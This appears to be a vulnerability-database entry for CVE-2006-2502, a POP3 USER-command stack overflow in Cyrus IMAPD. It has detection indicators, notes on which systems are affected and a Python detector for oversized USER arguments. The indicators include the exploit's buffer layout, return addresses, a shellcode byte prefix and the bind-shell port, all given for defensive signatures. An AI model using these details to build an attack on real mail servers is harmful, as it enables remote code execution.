CVE-2006-2502
published 2006-05-22


Priority: P3 48 medium
CVSS 2.0: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 53.33% (98.9th percentile)
Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.

Affected

1 range
Vendor | Product | Version range | Fixed in
cyrus | imapd | |

Detection & IOCs (extracted from sources)

port: 110
command: USER <shellcode><packed_offset x120>
other: 0x8106c20
other: 0x080fd318
other: 0x080fd204
  • Detect exploitation attempts by monitoring POP3 (TCP/110) for oversized USER commands — the exploit sends a USER argument containing shellcode followed by repeated return address packing, resulting in a payload well exceeding normal username length.
  • Alert on inbound TCP connections to port 13370 from a host that recently sent a malformed POP3 USER command — the bind-shell shellcode opens a listener on port 13370.
  • Scan network traffic on TCP/110 for the bind-shell shellcode byte sequence starting with \x31\xdb\x53\x43\x53\x6a\x02 within a USER command.
  • The exploit overwrites the GOT to place shellcode and defeat stack-protection/ASLR; monitor for unexpected executable memory writes in pop3d process space (e.g., via ptrace or kernel auditing).
  • The vulnerability is only triggerable when the non-default 'popsubfolders' option is enabled in Cyrus IMAPD config; audit imapd.conf for this setting as a risk indicator.
  • The Metasploit exploit buffer layout is: 'USER ' + 265 NOPs + ret*2 + (250-shellcode_len) NOPs + shellcode + 29 NOPs + sc_addr*4 + CRLF — use this structure to build a Snort/Suricata content match on TCP/110.
  • The vulnerability is only exploitable when the non-default 'popsubfolders' option is enabled in Cyrus IMAPD configuration; systems without this option are not affected.
  • Fedora Core 5 ships with the vulnerable code version but is not exploitable due to the FORTIFY_SOURCE compiler enhancement.
  • Red Hat Enterprise Linux versions of cyrus-imapd are not affected by this issue.
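
The first detection bullet above (oversized USER arguments on TCP/110), as an added example that is not from the original page or its sources: a Python check over a reassembled client-to-server POP3 byte stream. The 128-byte threshold, the function name and the sample bytes are assumptions constructed for illustration.

```python
import re

# RFC 1939 limits each POP3 argument to 40 printable-ASCII characters.
# 128 is an assumed, more tolerant site threshold, not a value from the advisory.
MAX_USER_ARG = 128
USER_RE = re.compile(rb"^USER[ \t]+(.*)$", re.IGNORECASE)

def inspect_pop3_stream(data: bytes, max_arg: int = MAX_USER_ARG) -> list[dict]:
    """Return one finding per suspicious USER command in a client-to-server stream."""
    findings = []
    # Split on LF and strip CR so clients sending bare LF are covered too.
    # A final line with no terminator is still inspected.
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        match = USER_RE.match(raw.rstrip(b"\r"))
        if not match:
            continue
        arg = match.group(1)
        reasons = []
        if len(arg) > max_arg:
            reasons.append("oversized")
        # Bytes outside 0x20-0x7e do not belong in a username argument.
        if any(b < 0x20 or b > 0x7E for b in arg):
            reasons.append("non-ascii-printable")
        if reasons:
            findings.append({"line": lineno, "arg_len": len(arg), "reasons": reasons})
    return findings

# Constructed sample stream: two ordinary commands, one overlong USER
# argument, and one short USER argument carrying binary bytes.
SAMPLE = (
    b"USER alice@example.org\r\n"
    b"PASS placeholder\r\n"
    b"user " + b"A" * 300 + b"\r\n"
    b"USER bob\x01\x02\xff\r\n"
)

if __name__ == "__main__":
    for finding in inspect_pop3_stream(SAMPLE):
        print(finding)
```
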

CVSS provenance

nvd | v2.0 | 5.1 | MEDIUM | AV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat | 5.1 | MEDIUM